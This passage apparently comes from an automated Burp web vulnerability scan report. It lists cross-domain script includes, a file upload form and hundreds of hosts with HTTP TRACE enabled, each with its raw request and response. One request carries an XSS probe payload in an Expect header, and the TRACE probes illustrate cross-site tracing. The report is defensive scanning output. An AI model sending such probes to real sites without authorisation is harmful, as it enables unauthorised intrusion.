Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=mh811o08atu0mld55rag6g7c94; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:12:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.79. http://www.washingtonpost.com/wl/jobs/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...
</script>

<script src="https://js.revsci.net/gateway/gw.js?csid=J05531"></script>
...[SNIP]...
</div>        
   
   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...
24.80. http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/html/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-adv/jobs4/html/xd_receiver.htm HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650; rss_now=false; wpni_poe=true; wp_pageview=1; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html
Expires: Sun, 01 May 2011 23:34:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:34:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Cross-Domain Receiver Page</tit
...[SNIP]...
<body> <script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js?2" type="text/javascript"></script>
...[SNIP]...
24.81. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnav_v2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnav_v2.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-srv/ssi/globalnav/js/channelnav_v2.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Tue, 31 Aug 2010 17:32:50 GMT
ETag: "ac8f-4c7d3cc2"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 44175

document.write('<link href="http://www.washingtonpost.com/wp-srv/ssi/globalnav/css/wp_global_nav.css" rel="stylesheet" media="all"/>');
document.write('<link href="http://www.washingtonpost.com/wp-sr
...[SNIP]...
</p>';
//out+= '<script src="https://WaPo.netmng.com/?aid=069" type="text/javascript" language="javascript" defer="defer"></script>
...[SNIP]...
24.82. http://www.whosampled.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whosampled.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whosampled.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 02 May 2011 00:33:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Language: en-us
Expires: Mon, 02 May 2011 01:32:56 GMT
Vary: Accept-Language,Cookie,Accept-Encoding
ETag: "bd9c0f0a5f594631dc6a63c873027a4a"
Cache-Control: max-age=3600
Last-Modified: Mon, 02 May 2011 00:32:56 GMT
Content-Length: 43858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000002226507">
</script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000004378507">
</script>


<script src="http://content.dl-rms.com/rms/27732/nodetag.js"></script>
...[SNIP]...
25. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.js-kit.com
Path:   /scripts/comments.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /scripts/comments.js HTTP/1.1
Host: cdn.js-kit.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=259200
Content-Type: application/javascript
Age: 59475
Date: Sun, 01 May 2011 23:33:49 GMT
Last-Modified: Sun, 01 May 2011 06:58:19 GMT
Expires: Wed, 04 May 2011 07:13:56 GMT
Connection: keep-alive
Content-Length: 474074


...[SNIP]...
<form class="js-kit-avatars-upload-form" method="POST" enctype="multipart/form-data" action="' + this.uriAvatar + 'add">' +
       '<input type="file" name="image" class="js-kit-avatars-upload-control" />' +
   '</form>
...[SNIP]...
26. TRACE method is enabled  previous  next
There are 314 instances of this issue:

26.1. http://bh.contextweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 5e1e820ff03798f2

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Content-Type: message/http
Content-Length: 130
Date: Mon, 02 May 2011 02:01:51 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 5e1e820ff03798f2
connection: Keep-Alive
cw-userhostaddress: 173.193.214.243
26.2. http://c.statcounter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 588d9b828378dc7b

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 588d9b828378dc7b

26.3. http://csrc.nist.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csrc.nist.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: csrc.nist.gov
Cookie: 8cbae272594a3879

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: csrc.nist.gov
Cookie: 8cbae272594a3879

26.4. http://d1.openx.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /

Request

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: be2152eec06dd95a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: be2152eec06dd95a
X-Forwarded-For: 173.193.214.243

26.5. http://danilolee.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://danilolee.com
Path:   /

Request

TRACE / HTTP/1.0
Host: danilolee.com
Cookie: 809b46f61504bdfa

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:00 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: danilolee.com
Cookie: 809b46f61504bdfa

26.6. http://dg.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: dg.specificclick.net
Cookie: 57692ac2a10ce0c

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 71
Date: Mon, 02 May 2011 02:04:37 GMT
Connection: close

TRACE / HTTP/1.0
host: dg.specificclick.net
cookie: 57692ac2a10ce0c
26.7. http://digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: abf0c1b647a1459c

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: abf0c1b647a1459c
Connection: Keep-Alive
X-forwarded-for: 173.193.214.243

26.8. http://hit.blvdstatus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hit.blvdstatus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: hit.blvdstatus.com
Cookie: a6613bb66dcd2da8

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: hit.blvdstatus.com
Cookie: a6613bb66dcd2da8

26.9. http://image2.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: a556c9e0f75ddda9

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:05:22 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: a556c9e0f75ddda9

26.10. http://metrics.washingtonpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.washingtonpost.com
Cookie: eb713d93a22917d8

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.washingtonpost.com
Cookie: eb713d93a22917d8
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

26.11. http://na.decdna.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /

Request

TRACE / HTTP/1.0
Host: na.decdna.net
Cookie: 628e8eb57c409ffa

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:08 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: na.decdna.net
Cookie: 628e8eb57c409ffa
Connection: Keep-Alive
DNA_IP: 173.193.214.243

26.12. http://pixel.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: dfb1c4110f6a9d76

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:04:54 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: dfb1c4110f6a9d76
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

26.13. http://sniff.visistat.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sniff.visistat.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sniff.visistat.com
Cookie: 791c1e7024399b71

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:34 GMT
Server: Apache/2.2.4 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sniff.visistat.com
Cookie: 791c1e7024399b71

26.14. http://t.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: 370de8cdf6fb28f5

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:10 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: 370de8cdf6fb28f5
Connection: Keep-Alive
MIG_IP: 173.193.214.243

26.15. http://tags.bluekai.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: 3fa39c625ee50d60

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Content-Type: message/http
Connection: close

TRACE / HTTP/1.0
Host: tags.bluekai.com
Cookie: 3fa39c625ee50d60
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=259200

26.16. http://track.blvdstatus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /

Request

TRACE / HTTP/1.0
Host: track.blvdstatus.com
Cookie: 7847a1b13dbca795

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: track.blvdstatus.com
Cookie: 7847a1b13dbca795

26.17. http://usjobsresource.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /

Request

TRACE / HTTP/1.0
Host: usjobsresource.com
Cookie: cc7afb8b1befeb74

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:56 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: usjobsresource.com
Cookie: cc7afb8b1befeb74

26.18. http://widgets.digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 6200694369bbc4ad

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:24:59 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 6200694369bbc4ad
Accept-Encoding: gzip
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.13
x-chpd-loop: 1
Via: 1.0 PXY002-ASHB.COTENDO.NET (chpd/4.00.0134.3)
Cneonction:
...[SNIP]...
26.19. http://www.2012-survival-guide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2012-survival-guide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.2012-survival-guide.com
Cookie: e2c6432e9181fe4

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.2012-survival-guide.com
Cookie: e2c6432e9181fe4

26.20. http://www.3fatchicks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3fatchicks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.3fatchicks.com
Cookie: 14b8904d2e38d66a

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:50 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerthreefatchicks_pool=535040172.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.3fatchicks.com
Cookie: 14b8904d2e38d66a
Connection: Keep-Alive

26.21. http://www.4tubehd.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4tubehd.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.4tubehd.com
Cookie: 3f0a6b963e88efae

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:40 GMT
Server: Apache/2.2.16 (FreeBSD) DAV/2 PHP/5.3.5 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.4tubehd.com
Cookie: 3f0a6b963e88efae

26.22. http://www.aacap.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aacap.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aacap.org
Cookie: fc9c5b55e43b37cb

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:13:51 GMT
Server: Apache/2.0.52 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aacap.org
Cookie: fc9c5b55e43b37cb

26.23. http://www.abcpaydaydirect.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abcpaydaydirect.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.abcpaydaydirect.com
Cookie: aa3bd7f70a184f25

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:20 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: aa3bd7f70a184f25
Host: www.abcpaydaydirect.com

26.24. http://www.abctie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abctie.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.abctie.com
Cookie: 5701d98e173ec8d2

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.abctie.com
Cookie: 5701d98e173ec8d2

26.25. http://www.abcxml.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abcxml.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.abcxml.com
Cookie: 673b717ff873f926

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:55:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.abcxml.com
Cookie: 673b717ff873f926

26.26. http://www.acadiaferry.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acadiaferry.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.acadiaferry.com
Cookie: b27c38eb132828ed

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:48 GMT
Server: Apache/1.3.42 (Unix) Resin/2.1.13 mod_fastcgi/2.4.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b27c38eb132828ed
Host: www.acadiaferry.com

26.27. http://www.aces.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aces.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aces.edu
Cookie: 654018f6e4d78781

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:34 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aces.edu
Cookie: 654018f6e4d78781

26.28. http://www.activexguide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.activexguide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.activexguide.com
Cookie: 6687ec2d80a23bf7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.activexguide.com
Cookie: 6687ec2d80a23bf7

26.29. http://www.add50.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.add50.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.add50.com
Cookie: dcd052edcd47e5ff

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:28 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25 PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.add50.com
Cookie: dcd052edcd47e5ff

26.30. http://www.admez.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.admez.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.admez.com
Cookie: cdc640c8293e2865

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.admez.com
Cookie: cdc640c8293e2865

26.31. http://www.aggressivedeals.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aggressivedeals.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.aggressivedeals.com
Cookie: e1228a33e39c9be7

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.aggressivedeals.com
Cookie: e1228a33e39c9be7

26.32. http://www.allelectronics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allelectronics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.allelectronics.com
Cookie: 7a5517350101eb7

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 7a5517350101eb7
Host: www.allelectronics.com

26.33. http://www.amateursea.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amateursea.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.amateursea.com
Cookie: fb41359d82f9f63

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:27:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: fb41359d82f9f63
Host: www.amateursea.com

26.34. http://www.americanbible.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanbible.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.americanbible.org
Cookie: 8ecccbe408451c35

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.americanbible.org
Cookie: 8ecccbe408451c35

26.35. http://www.androidtablets.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidtablets.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.androidtablets.net
Cookie: b8536dc24c6ca7a6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:39 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.androidtablets.net
Cookie: b8536dc24c6ca7a6

26.36. http://www.andypioneer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.andypioneer.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.andypioneer.com
Cookie: 65dfe0b19489010e

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:42:55 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.andypioneer.com
Cookie: 65dfe0b19489010e

26.37. http://www.anilinkz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anilinkz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.anilinkz.com
Cookie: b6a274b6be1e336d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:34 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.anilinkz.com
Cookie: b6a274b6be1e336d

26.38. http://www.animatedknots.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.animatedknots.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.animatedknots.com
Cookie: 9b51388f0373b2bd

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.animatedknots.com
Cookie: 9b51388f0373b2bd

26.39. http://www.anvato.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.anvato.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.anvato.com
Cookie: 6440e2452746439

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:57 GMT
